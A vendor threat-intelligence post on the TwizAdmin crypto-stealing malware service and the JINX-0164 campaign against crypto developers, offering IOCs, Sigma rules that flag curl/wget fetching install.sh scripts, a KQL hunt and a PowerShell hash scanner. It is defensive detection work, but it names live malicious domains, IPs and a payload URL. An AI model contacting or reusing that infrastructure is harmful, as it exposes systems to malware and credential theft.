Back to Intelligence

TwizAdmin MaaS & JINX-0164 Dev Targeting: Multi-Stage Crypto Theft & Regional C2 Surge Analysis

SA
Security Arsenal Team
May 28, 2026
6 min read

Threat Summary

Recent intelligence from AlienVault OTX reveals a coordinated surge in cyber-activity targeting the cryptocurrency ecosystem and utilizing regional infrastructure for command-and-control (C2) operations.

The reporting period highlights the emergence of TwizAdmin, a sophisticated Malware-as-a-Service (MaaS) operation by the DataBreachPlus threat actor. This modular platform combines cryptocurrency clippers, seed phrase stealers, infostealers, and ransomware (crpx0) into a single FastAPI-managed suite, distributed via logistics-themed (FedEx) lures targeting both Windows and macOS.

Simultaneously, a new threat actor, JINX-0164, has been identified conducting precision supply chain attacks against cryptocurrency development teams. utilizing LinkedIn social engineering to deliver custom macOS malware (AUDIOFIX, MINIRAT) via trojanized npm packages and fraudulent domains.

Underpinning these campaigns is a massive expansion of malicious infrastructure in the Middle East. Over 1,350 C2 servers were mapped across 98 providers, with Saudi Arabia’s STC hosting 72.4% of the regional infrastructure, facilitating operations for groups like APT28, Energetic Bear, and ransomware operators (LockBit Black).

Threat Actor / Malware Profile

DataBreachPlus (TwizAdmin)

  • Malware Families: TwizAdmin (Java RAT), crpx0 (Ransomware).
  • Distribution Method: Malicious emails posing as FedEx notifications; links to domains like fanonlyatn.xyz delivering payloads.
  • Payload Behavior: Multi-stage attack starting with a clipboard hijacker targeting 8 cryptocurrency blockchains. Escalates to BIP-39 seed phrase theft and browser credential exfiltration. Includes a ransomware module (crpx0).
  • C2 Communication: FastAPI-based panel hosted on port 1337; requires license key activation.
  • Persistence: Likely via scheduled tasks or launch agents (implied by multi-platform support).

JINX-0164

  • Malware Families: AUDIOFIX (Python Infostealer), MINIRAT (Go Backdoor).
  • Distribution Method: LinkedIn phishing (recruiter persona) leading to supply chain compromise (trojanized npm packages). Use of typosquatting domains (teamicrosoft.com, live.ong).
  • Payload Behavior: Python-based AUDIOFIX functions as an infostealer and RAT. MINIRAT provides lightweight remote access. Focuses on hijacking CI/CD pipelines and stealing developer credentials.
  • Persistence: macOS specific (LaunchAgents), utilizing shell scripts (install.sh) for initial deployment.

IOC Analysis

The provided indicators span multiple categories essential for detection:

  • Network Infrastructure: A significant concentration of IPv4 addresses (e.g., 37.32.15.8, 197.51.170.131) linked to Middle Eastern hosting providers acting as C2 nodes. SOC teams should immediately block these IPs at perimeter firewalls and monitor for egress connections.
  • Typosquatting & Delivery Domains: Domains such as teamicrosoft.com and driver-updater.net are critical for phishing detection. DNS query logs should be tuned to detect these specific resolutions and similar high-entropy variations.
  • File Hashes: Multiple SHA256 hashes (e.g., 06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092) correspond to TwizAdmin and JINX payloads. These should be integrated into EDR solutions for immediate scanning and quarantine.
  • Operationalization: Utilize SIEM correlation rules to match the specific URLs (https://fanonlyatn.xyz/files/) and the C2 port 1337 mentioned in the TwizAdmin panel.

Detection Engineering

YAML
title: Potential TwizAdmin Java RAT C2 Activity
id: 8e4f1a20-b1e2-4c3d-9e5f-6a7b8c9d0e1f
description: Detects Java processes (TwizAdmin) establishing connections on non-standard port 1337, associated with the FastAPI C2 panel.
author: Security Arsenal
date: 2026/05/28
modified: 2026/05/28
tags:
    - attack.command_and_control
    - attack.t1071
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\java.exe'
        DestinationPort: 1337
        Initiated: 'true'
    condition: selection
falsepositives:
    - Legitimate Java applications running on port 1337 (rare)
level: high

---

title: Suspicious macOS Shell Script Download (JINX-0164)
id: f3b2c1d0-e9f8-4a7b-8c6d-5e4f3a2b1c0d
description: Detects curl or wget processes downloading shell scripts from suspicious paths often used in JINX-0164 initial access.
author: Security Arsenal
date: 2026/05/28
modified: 2026/05/28
tags:
    - attack.initial_access
    - attack.t1190
    - attack.t1566.001
logsource:
    category: process_creation
    product: macos
detection:
    selection_tools:
        Image|endswith:
            - '/curl'
            - '/wget'
    selection_payload:
        CommandLine|contains:
            - 'install.sh'
            - 'troubleshoot/mac'
    condition: all of selection*
falsepositives:
    - Legitimate developer tooling updates
level: medium

---

title: Typosquatting Domain Access - LinkedIn Phishing (JINX-0164)
id: a1b2c3d4-e5f6-4a7b-8c9d-0e1f2a3b4c5d
description: Identifies DNS requests or process connections to known typosquatting domains used in JINX-0164 campaigns.
author: Security Arsenal
date: 2026/05/28
modified: 2026/05/28
tags:
    - attack.initial_access
    - attack.t1566.002
logsource:
    category: dns_query
    product: windows
detection:
    selection_domains:
        QueryName|contains:
            - 'teamicrosoft.com'
            - 'live.us.org'
            - 'driver-updater.net'
    condition: selection_domains
falsepositives:
    - None expected
level: critical


kql
// Hunt for JINX-0164 and TwizAdmin Network Indicators
// Scope: DeviceNetworkEvents, DeviceProcessEvents
let IOCs = dynamic([
    "fanonlyatn.xyz", 
    "driver-updater.net", 
    "live.ong", 
    "teamicrosoft.com",
    "login.teamicrosoft.com",
    "89.36.224.5",
    "37.32.15.8",
    "197.51.170.131"
]);
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (IOCs) or RemoteIP has_any (IOCs)
| extend ThreatIntel = "TwizAdmin_JINX0164"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort, ThreatIntel
| sort by Timestamp desc


powershell
# IOC Hunt Script for TwizAdmin / JINX-0164 Indicators
# Checks for file presence of specific hashes and registry persistence artifacts

$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"
)

$SuspiciousDomains = @(
    "fanonlyatn.xyz",
    "driver-updater.net",
    "teamicrosoft.com"
)

Write-Host "[+] Hunting for TwizAdmin / JINX-0164 File Hashes..." -ForegroundColor Cyan

# Scan C:\ drive for specific hashes (Requires Get-FileHash)
$PathsToScan = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp")

foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | 
        ForEach-Object {
            try {
                $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
                if ($TargetHashes -contains $Hash) {
                    Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (Hash: $Hash)" -ForegroundColor Red
                }
            } catch {
                # Ignore access errors
            }
        }
    }
}

Write-Host "[+] Checking Hosts File for Suspicious Domains..." -ForegroundColor Cyan
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath
    foreach ($Domain in $SuspiciousDomains) {
        if ($HostsContent -match $Domain) {
            Write-Host "[!] SUSPICIOUS ENTRY IN HOSTS FILE: $Domain" -ForegroundColor Yellow
        }
    }
}

Write-Host "[+] Checking for Suspicious Scheduled Tasks (Generic Clipper/RAT patterns)..." -ForegroundColor Cyan
Get-ScheduledTask | Where-Object { 
    $_.TaskName -match "Update" -or 
    $_.TaskName -match "Driver" -or
    $_.Actions.Execute -match "java" -or
    $_.Actions.Execute -match "powershell" -and 
    $_.Actions.Arguments -match "-enc"
} | Select-Object TaskName, State, LastRunTime | Format-Table -AutoSize

Response Priorities

  • Immediate:
    • Block all listed IOCs (IPs, Domains, URLs) at the perimeter and proxy level.
    • Scan endpoints for the specific SHA256 hashes associated with TwizAdmin and JINX-0164.
    • Isolate any devices with detected connections to port 1337 or the specific Middle Eastern C2 IP ranges.
  • 24 Hours:
    • Conduct credential audits for users who may have interacted with FedEx lures or LinkedIn recruitment messages.
    • Force-reset passwords for cryptocurrency wallets and development accounts (GitHub, npm) accessed from potentially compromised endpoints.
  • 1 Week:
    • Review and restrict GitHub Actions/CI/CD pipelines to prevent supply chain injection (JINX-0164 vector).
    • Implement DNS Sinkholing for the identified typosquatting domains.
    • Update awareness training to include specific examples of logistics-themed malware and LinkedIn social engineering.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-apttwizadminjinx-0164c2-infrastructuresupply-chain-attackcryptocurrency-theft

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action